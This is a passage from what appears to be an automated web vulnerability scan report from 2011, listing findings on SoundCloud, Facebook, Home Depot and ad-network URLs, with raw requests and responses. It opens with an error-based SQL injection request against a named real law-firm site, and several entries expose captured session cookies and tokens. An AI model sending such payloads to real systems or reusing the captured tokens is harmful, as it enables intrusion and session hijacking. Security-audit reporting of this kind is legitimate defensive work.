GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8. SSL cookie without secure flag set previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://soundcloud.com
Path:	/login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_soundcloud_session=BAh7BjoPc2Vzc2lvbl9pZCIlMTc0MTI2ZWY5ZTUwYjM0ZDExN2RlZjk5MTczOGY2ZGI%3D--390e347febf2cb033a41f6e311bdcccf4435f0cc; domain=soundcloud.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /login?ref=top HTTP/1.1
Host: soundcloud.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=179375142.1308252461.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-665808856-1308252464224; __utma=179375142.490461593.1308252461.1308252461.1308252461.1; __utmb=179375142.2.10.1308252461; __utmc=179375142

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 19:28:26 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Runtime: 22
ETag: "1738f742fd61dd7dd8b6aeb39b674fd3"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _soundcloud_session=BAh7BjoPc2Vzc2lvbl9pZCIlMTc0MTI2ZWY5ZTUwYjM0ZDExN2RlZjk5MTczOGY2ZGI%3D--390e347febf2cb033a41f6e311bdcccf4435f0cc; domain=soundcloud.com; path=/; HttpOnly
Vary: Accept-Encoding,
Content-Length: 20960

<!DOCTYPE html>
<html><head><meta charset="utf-8" />
<title>Log In on SoundCloud - Create, record and share your sounds for free</title>
<meta content="record, sounds, share, sound, audio, tracks, mus
...[SNIP]...

9. Session token in URL previous next
There are 3 instances of this issue:

http://l.sharethis.com/pview
http://www.facebook.com/extern/login_status.php
http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

9.1. http://l.sharethis.com/pview previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://l.sharethis.com
Path:	/pview

Issue detail

The URL in the request appears to contain a session token within the query string:

http://l.sharethis.com/pview?event=pview&publisher=9195da24-0bcd-4ebe-a8ce-e3d41c256d61&hostname=www.ilslaunch.com&location=%2Fmission-control%2Fmission-skyterra-1&url=http%3A%2F%2Fwww.ilslaunch.com%2Fmission-control%2Fmission-skyterra-1&sessionID=1308221460500.72084&fpc=ca8fce1-13098135017-1f1d1625-1&ts1308221464149.0&r_sessionID=&hash_flag=&shr=&count=1&refDomain=www.lightsquared.com&refQuery=http%3A%2F%2Fwww.lightsquared.com%2F

Request

GET /pview?event=pview&publisher=9195da24-0bcd-4ebe-a8ce-e3d41c256d61&hostname=www.ilslaunch.com&location=%2Fmission-control%2Fmission-skyterra-1&url=http%3A%2F%2Fwww.ilslaunch.com%2Fmission-control%2Fmission-skyterra-1&sessionID=1308221460500.72084&fpc=ca8fce1-13098135017-1f1d1625-1&ts1308221464149.0&r_sessionID=&hash_flag=&shr=&count=1&refDomain=www.lightsquared.com&refQuery=http%3A%2F%2Fwww.lightsquared.com%2F HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.ilslaunch.com/mission-control/mission-skyterra-1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Thu, 16 Jun 2011 10:51:03 GMT
Connection: keep-alive

9.2. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&app_id=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15c308c4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3da8bb3a%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32f64b5c4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df52e3ff4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32f64b5c4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfab071a2%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32f64b5c4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df679066b4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32f64b5c4&sdk=joey&session_origin=1&session_version=3

Request

GET /extern/login_status.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&app_id=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15c308c4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3da8bb3a%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32f64b5c4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df52e3ff4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32f64b5c4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfab071a2%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32f64b5c4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df679066b4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32f64b5c4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.26.29
X-Cnection: close
Date: Thu, 16 Jun 2011 11:22:22 GMT
Content-Length: 237

<script type="text/javascript">
parent.postMessage("cb=fab071a2&origin=http\u00253A\u00252F\u00252Fonline.wsj.com\u00252Ff25ccc10d&relation=parent&transport=postmessage&frame=f32f64b5c4", "http:\/\/on
...[SNIP]...

9.3. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/Bopis2OverLay

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay?R=202562705&storeId=10051&orderItemId=&langId=-1&catalogId=10053&storeSkuNum=420816&Overlay_Type=add_to_cart&locStoreNum=2583&pageNum=1&userZip=20018&mode=localstore&quantity=1&basePage=PLP&searchSessionId=4df9ea22-010b-0000-02b7-726f-1cc1de029fbe&searchOriginId=GeoAddress.3:US,,DC,District+of+Columbia,Washington,,,20018,,38.928500,-76.973500,Z1XAA,0,-1.000000,,1,0,N,0,0,314159.265358,314159.265358,0,,,-1.000000,,userFields,0,searchFields,0,textFields,0,categories,0,addData,0,

Request

GET /webapp/wcs/stores/servlet/Bopis2OverLay?langId=-1&storeId=10051&catalogId=10053&R=202562705&langId=-1&catalogId=10053&storeSkuNum=420816&Overlay_Type=add_to_cart&locStoreNum=2583&pageNum=0&mode=localstore&quantity=1&basePage=PLP HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224031349%3a%3bC25%5fEXP%3d1360064031%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000

Response

10. Cookie scoped to parent domain previous next
There are 295 instances of this issue:

http://cts-log.channelintelligence.com/
http://login.dotomi.com/ucm/UCMController
http://pixel.everesttech.net/1688/i
http://t.mookie1.com/t/v1/imp
http://ttwbs.channelintelligence.com/
http://www.creditcards.com/xtrack.php
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation
http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay
http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation
http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate
http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService
http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay
http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService
http://www.ilslaunch.com/skyterra-1-mission-control
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
http://a.amxdt.com/px/
http://a.rfihub.com/cm
http://a.rfihub.com/cm
http://a.rfihub.com/sed
http://a.rfihub.com/tk.gif
http://a.tribalfusion.com/i.match
http://a.tribalfusion.com/j.ad
http://a1.interclick.com/ColDta.aspx
http://a1.interclick.com/Segment.aspx
http://admeld.adnxs.com/usersync
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.undertone.com/ajs.php
http://ak1.abmr.net/is/ads.undertone.com
http://ak1.abmr.net/is/r1-ads.ace.advertising.com
http://ak1.abmr.net/is/tag.admeld.com
http://ak1.abmr.net/is/www.homedepot.com
http://amch.questionmarket.com/adsc/d844890/33/39959888/decide.php
http://amch.questionmarket.com/adsc/d844890/33/39959895/decide.php
http://amch.questionmarket.com/adsc/d844890/33/39959897/decide.php
http://api.bizographics.com/v1/profile.json
http://api.bizographics.com/v1/profile.redirect
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://ar.voicefive.com/bmx3/broker.pli
http://ar.voicefive.com/bmx3/broker.pli
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://b.voicefive.com/b
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://c7.zedo.com/img/bh.gif
http://cas.criteo.com/delivery/afr.php
http://click.linksynergy.com/fs-bin/click
http://d7.zedo.com/img/bh.gif
http://dis.ny.us.criteo.com/dis/dis.aspx
http://ebay.adnxs.com/ttj
http://ib.adnxs.com/getuid
http://ib.adnxs.com/getuidu
http://ib.adnxs.com/mapuid
http://ib.adnxs.com/ptj
http://ib.adnxs.com/pxj
http://ib.adnxs.com/seg
http://ib.adnxs.com/setuid
http://idcs.interclick.com/Segment.aspx
http://image2.pubmatic.com/AdServer/Pug
http://imp.constantcontact.com/imp/cmp.jsp
http://js.revsci.net/common/pcx.js
http://js.revsci.net/gateway/gw.js
http://leadback.advertising.com/adcedge/lb
http://map.media6degrees.com/orbserv/hbpix
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1049999702@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1102913360@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1127856009@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1245329572@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1275267067@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1286122757@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1461570951@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1608535405@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1646228634@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1729780354@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1767572891@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1809071643@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1851473663@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1933034357@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1059242575@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1091147736@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1098629905@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1319798396@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1443368947@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1512823451@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1551279173@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1704218535@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1726433512@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1777416209@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1815229995@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1861592040@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1885484252@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1930646721@Top1
http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js
http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js
http://optimized-by.rubiconproject.com/a/dk.html
http://optimized-by.rubiconproject.com/a/dk.html
http://optimized-by.rubiconproject.com/a/dk.js
http://optimized-by.rubiconproject.com/a/dk.js
http://p.opt.fimserve.com/bht/
http://pbid.pro-market.net/engine
http://phoenix.untd.com/TRCK/RGST
http://pix04.revsci.net/D10889/a1/0/3/0.gif
http://pix04.revsci.net/D10889/a1/0/3/0.gif
http://pix04.revsci.net/D10889/a1/0/3/0.gif
http://pix04.revsci.net/E06560/b3/0/3/noscript.gif
http://pix04.revsci.net/G07608/a4/0/0/pcx.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/111571878.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/118546994.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/128597095.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/149141737.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/152539728.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/153416135.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/167338616.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/174739392.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/178674175.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/204994515.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/20510025.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/206078584.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/209054641.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/210088310.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/235290478.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/242178359.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/252539645.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/266352153.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/266715150.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/266829410.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/271822828.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/298241288.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/306033605.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/31221949.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/319879025.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/321200067.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/325815715.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/329181290.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/351391247.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/35234473.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/352735390.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/400010602.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/4030732.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/411814556.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/434601309.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/448263760.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/450083429.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/469061960.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/47135208.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/474207582.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/48193081.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/482745036.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/518130278.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/541993060.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/572738137.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/579855884.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/602675862.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/603496051.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/609031637.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/609523113.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/61287048.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/616476492.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/623863779.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/632139984.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/656764106.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/663059389.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/677906397.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/678221040.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/697771504.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/700812667.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/7130573.js
